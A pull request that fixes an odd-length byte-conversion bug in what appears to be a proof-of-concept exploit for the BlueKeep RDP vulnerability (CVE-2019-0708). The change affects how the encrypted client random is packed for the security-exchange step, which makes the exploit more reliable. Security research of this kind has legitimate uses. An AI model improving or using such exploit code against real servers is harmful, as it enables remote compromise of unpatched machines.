### PR TITLE
Handling the "Odd-length string" in the int_to_bytestring() method.

### DIFF
--- a/poc/cve_2019_0708_bluekeep.py
+++ b/poc/cve_2019_0708_bluekeep.py
@@ -313,10 +313,10 @@ def bytes_to_bignum(bytesIn, order = "little"):
     s = "0x"+bytes
     return int(s,16)
 
-def int_to_bytestring(daInt):
-    hex_pkt = "%x"%daInt
-    return binascii.unhexlify(hex_pkt)[::-1]
-
+def int_to_bytestring(bignum, length):
+    h = '%x' % bignum
+    bytestring = ('0'*(len(h) % 2) + h).zfill(length*2).decode('hex')
+    return bytestring[::-1]
 
 def rsa_encrypt(bignum, rsexp, rsmod):
     return (bignum ** rsexp) % rsmod
@@ -386,7 +386,12 @@ def msc_attach_user_pdu():
 
 def pdu_security_exchange(rcran, rsexp, rsmod, bitlen):
     encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
-    encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
+
+    nbytes, rem = divmod(encrypted_rcran_bignum.bit_length(),8)
+    if rem:
+       nbytes += 1
+
+    encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum, nbytes)
 
     bitlen += 8
     bitlen_hex = struct.pack("<L",bitlen)


### PR DESCRIPTION
The current int_to_bytestring method is susceptible to the "Odd-length string" error.
Added a verification with bit_length() and adjusted the conversion into bytestring.